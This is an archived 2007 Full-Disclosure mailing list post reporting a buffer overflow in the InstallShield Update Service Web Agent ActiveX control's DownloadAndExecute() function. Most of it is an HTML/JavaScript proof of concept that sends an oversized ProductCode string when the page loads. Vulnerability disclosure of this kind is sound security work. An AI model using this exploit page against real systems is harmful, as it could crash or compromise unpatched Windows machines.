|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Elazar Broad (elazarb
earthlink.net)
Date: Sun Dec 23 2007 - 22:45:21 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
The InstallShield Update Service Web Agent version 5.1.100.47363 suffers from an
exploitable buffer overflow in the ProductCode parameter of the DownloadAndExecute()
function. This object is marked safe for scripting. Note that this issue appears to different
from http://www.securityfocus.com/bid/26280(the iDefense advisory seems to be talking about insecure methods), however, the patch referenced in that
issue fixes this issue as well since the update renders this object unsafe for scripting.
PoC as follows:
-----------------------
<!--
written by e.b.
-->
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var s = 'A';
while (s.length <= 12000) s = s + 'A';
obj.Initialize("", "", "", "");
obj.DownloadAndExecute("", s, 0, "", "");
}
</script>
</head>
<body onload="JavaScript: return Check();">
<object id="obj" classid="clsid:E9880553-B8A7-4960-A668-95C68BED571E"
/>
</object>
</body>
</html>
-----------------------
Elazar
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]